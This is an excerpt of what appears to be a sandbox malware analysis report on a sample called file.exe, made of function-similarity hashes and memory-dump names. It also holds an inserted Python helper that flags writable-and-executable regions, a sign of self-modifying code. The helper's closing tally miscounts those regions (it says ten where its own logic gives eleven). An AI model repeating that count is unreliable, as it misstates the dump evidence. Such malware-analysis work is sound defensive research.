          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: 0$8
          • API String ID: 0-46163386
          • Opcode ID: 4ecc9b09b41ee8282fe5fd18b714e67c52c52f42ef4427ad792b4940721b3a82
          • Instruction ID: 7fcb14bf7d645947a766b1e22dafca55b9c141bfcdf1ca8ee08616f1ce420126
          • Opcode Fuzzy Hash: 4ecc9b09b41ee8282fe5fd18b714e67c52c52f42ef4427ad792b4940721b3a82
          • Instruction Fuzzy Hash: 82A11175608780DFD320CF28D84079ABBE2BB99304F18895CE9D897362C775EA59CF52
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: efg`$efg`
          • API String ID: 0-3010568471
          • Opcode ID: 3f41bca26655fdd470eb0cd4b6f73c79619549e82ea71c30cb596c71d868a849
          • Instruction ID: 7094ba32f5eac889444ff96058a09d468edf24b7ffec481a9b7a4a45c178072e
          • Opcode Fuzzy Hash: 3f41bca26655fdd470eb0cd4b6f73c79619549e82ea71c30cb596c71d868a849
          • Instruction Fuzzy Hash: D131B032A083518BD328DF50D5A166FB792BBE4304F6A442CE9C667665CB309E0AC7D2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: st@
          • API String ID: 0-3741395493
          • Opcode ID: baf9e9b5487d174ceb013efd8ce198841e92f25f1979b55950ca1c4a4817d528
          • Instruction ID: 3f3fe13bf8887986914c701ca1fad68dc43eaf5c0527591247f95d163d9599b1
          • Opcode Fuzzy Hash: baf9e9b5487d174ceb013efd8ce198841e92f25f1979b55950ca1c4a4817d528
          • Instruction Fuzzy Hash: 0EF147B150C3928FD704CF24C89136BBBE6AF96304F18886DF5D58B282D775D94ACB92
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: =:;8
          • API String ID: 2994545307-508151936
          • Opcode ID: 61a14a376a0e237d0f8a3f17ab23e36e286f1e3f03f9a808d018d1d48ec55598
          • Instruction ID: 23cd34d81ee320545a0b7ecfc22e37debd0bc813b20c52bf25f4ae39d10a29d7
          • Opcode Fuzzy Hash: 61a14a376a0e237d0f8a3f17ab23e36e286f1e3f03f9a808d018d1d48ec55598
          • Instruction Fuzzy Hash: D9D16BB2A483118BD724CE68CC9267BB792EBD5304F1A873DD8864B391DF749C16C792
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: efg`
          • API String ID: 0-115929991
          • Opcode ID: f59af72ce31133cf0e2d9210fdfb4ec939cc4777b5e0e0d2b788b65679b7b2fa
          • Instruction ID: 1f2210367d37c3f0fdd722dd980d6c117369cdb0a9da1a292e6843a4f2e83517
          • Opcode Fuzzy Hash: f59af72ce31133cf0e2d9210fdfb4ec939cc4777b5e0e0d2b788b65679b7b2fa
          • Instruction Fuzzy Hash: A6C13471900215CBDB24DF68DC92ABF73B0FF5A315F184168E856AB291E734AE05CBA1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: _^]\
          • API String ID: 2994545307-3116432788
          • Opcode ID: e12a280e3711955fa9dd743b6156a1d1c7ae243ed4d62621dd598a79b6425926
          • Instruction ID: 64767dbf5dd35079ea22c30f3677cc3dab7b8d0a23a25a2725d63ad254d081c6
          • Opcode Fuzzy Hash: e12a280e3711955fa9dd743b6156a1d1c7ae243ed4d62621dd598a79b6425926
          • Instruction Fuzzy Hash: 8581D0362083419BC719EF18D890A2AB3F6FF99710F15852CF9859B364D730EE52CB82
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: ,
          • API String ID: 0-3772416878
          • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
          • Instruction ID: 4da3d9bee57ef268567fa3d8a7bd043d5bbc7cfee8d48d1578945b7142d38732
          • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
          • Instruction Fuzzy Hash: 51B148701083819FD325CF68C89061BFBE0AFAA708F444A2DE5D997352D771E918CBA7
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: 5|iL
          • API String ID: 2994545307-1880071150
          • Opcode ID: 5f37c3a24117ec696c655754f8e25d9aab40cf160e192eeb34fe98f77854ed6b
          • Instruction ID: 42887b370c519562e9bc5d37f5e25c039b7921e0dfa6784c360d57925391a262
          • Opcode Fuzzy Hash: 5f37c3a24117ec696c655754f8e25d9aab40cf160e192eeb34fe98f77854ed6b
          • Instruction Fuzzy Hash: 1E71B932A083108BC7149E689CC0767B7B6EBD5724F25C66CE9989B3A5D771DC428BC1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: CAl
          • API String ID: 0-149732701
          • Opcode ID: d326b3c132cbe232578207e1862e020511d2d5a5234cbf299b9ce1d79a8398b5
          • Instruction ID: 5b2ce71dd2c4637d05d424536178754b14a79de133c176689c430133069f1fb0
          • Opcode Fuzzy Hash: d326b3c132cbe232578207e1862e020511d2d5a5234cbf299b9ce1d79a8398b5
          • Instruction Fuzzy Hash: BE615DF3A083049BE3086E2DED9577ABBD6DB94710F1A453DEBC983784E93919108686
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: InitializeThunk
          • String ID: efg`
          • API String ID: 2994545307-115929991
          • Opcode ID: 53fca02f01486019e3cb8b35302271f81254045cb8a19584cd50d693a9d85b86
          • Instruction ID: be5e9e2a402405df4e69ed6a056c72d248ff9d50d85d88c568e62317e28eaa4c
          • Opcode Fuzzy Hash: 53fca02f01486019e3cb8b35302271f81254045cb8a19584cd50d693a9d85b86
          • Instruction Fuzzy Hash: 4B514E72A043505BD720EB609C92BAF77A3BFE1714F154428E94D67262DF306A46C7D3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: u~=
          • API String ID: 0-2427564964
          • Opcode ID: f4e50dbfcc2f43bbab548be05bfeee39d2d2b66843ba293af610949044ea5a29
          • Instruction ID: 2612b1437205b6a97aecced875199b3dd1fb92465d78e19bd1fa68c530eeb085
          • Opcode Fuzzy Hash: f4e50dbfcc2f43bbab548be05bfeee39d2d2b66843ba293af610949044ea5a29
          • Instruction Fuzzy Hash: 404124B3A086205BF3086A79DC5A777BBD9DB84720F1B863EE989D3780ED741C018295
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: D
          • API String ID: 0-2746444292
          • Opcode ID: 8298f085ed15b7c60e4008712d559a17ff7c1d2223aba1d113a9eb780f22e0a7
          • Instruction ID: 509ec4c700808d84c2e68b130eb89c1b53aec83b09a75ec97f92287aec3404c6
          • Opcode Fuzzy Hash: 8298f085ed15b7c60e4008712d559a17ff7c1d2223aba1d113a9eb780f22e0a7
          • Instruction Fuzzy Hash: 685110B05493808AE7208F16C86175BBBF1FF91B44F20990CE6D91B3A4D7B69949CF87
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID:
          • String ID: @8gz
          • API String ID: 0-172250699
          • Opcode ID: 8110d7e1d4f3221609ee0cccaea640a6b1f7dce87c984027da312d0ef54f704f
          • Instruction ID: a7e50ef9dce370a04f8871d39f10bc6a5e24fe9c0d21d8187188f5286bd8880f
          • Opcode Fuzzy Hash: 8110d7e1d4f3221609ee0cccaea640a6b1f7dce87c984027da312d0ef54f704f
          • Instruction Fuzzy Hash: 273128F3E482185BF3145868EC9437AB7C9D794320F2B4639DAA8A77C5E93E1C084681
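          The memory-dump names listed under "Memory Dump Source" and "Associated" above carry the information an analyst needs to decide which dump to open first: the region's base address and its page protection. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling; it parses the thirteen names that appear in this section and flags every image-backed region that was both writable and executable at dump time, which is the condition behind the "changes PE section rights" and "self modifying code" signatures. The field layout it assumes (process index, stage, counter, base address, Windows PAGE_* protection, two opaque fields, MEM_* region type, trailing index) is inferred from the values on this page and is an assumption, not a documented Joe Sandbox naming scheme; the PAGE_* and MEM_* constants themselves are the winnt.h values.

```python
import re

# Dump names copied from the "Memory Dump Source" / "Associated" entries of this report section.
DUMP_NAMES = [
    "00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp",
]

# Page-protection and region-type constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# ASSUMED field layout: proc.stage.counter.base.protect.f6.type.f8.sdmp
# Fields 6 and 8 are kept as raw strings because their meaning is not known from the page.
NAME_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


def parse_dump_name(name: str) -> dict:
    """Split one .sdmp name into its fields and decode the protection/type values."""
    m = NAME_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    proc, stage, counter, base, protect, f6, mtype, f8 = m.groups()
    protect_val = int(protect, 16)
    type_val = int(mtype, 16)
    return {
        "process_index": int(proc, 16),
        "stage": int(stage, 16),
        "counter": counter,
        "base": int(base, 16),
        "protect": protect_val,
        "protect_name": PAGE_PROTECT.get(protect_val, f"0x{protect_val:x}"),
        "type_name": MEM_TYPE.get(type_val, f"0x{type_val:x}"),
        "field6": f6,
        "field8": f8,
    }


def rwx_regions(names) -> list:
    """Return (base, protection name) for every region that is both writable and executable."""
    hits = []
    for n in names:
        d = parse_dump_name(n)
        if d["protect"] in EXECUTABLE and d["protect"] in WRITABLE:
            hits.append((d["base"], d["protect_name"]))
    return sorted(hits)


def summarize(names) -> list:
    """One human-readable line per dump, sorted by base address, for quick triage."""
    rows = sorted((parse_dump_name(n) for n in names), key=lambda d: d["base"])
    return [f"{d['base']:#010x}  {d['protect_name']:<24} {d['type_name']}" for d in rows]


if __name__ == "__main__":
    for line in summarize(DUMP_NAMES):
        print(line)
    print(f"{len(rwx_regions(DUMP_NAMES))} of {len(DUMP_NAMES)} regions are writable+executable")
```

Running it shows that only the PE header region at 0x140000 and the region at 0x197000 were plain PAGE_READWRITE; the code at 0x141000 (the "Source File" of most function entries above) and nine further regions were RWX, which is why the unpacked code in those dumps, rather than the on-disk file.exe, is the right input for disassembly and the fuzzy-hash comparisons listed here.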
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
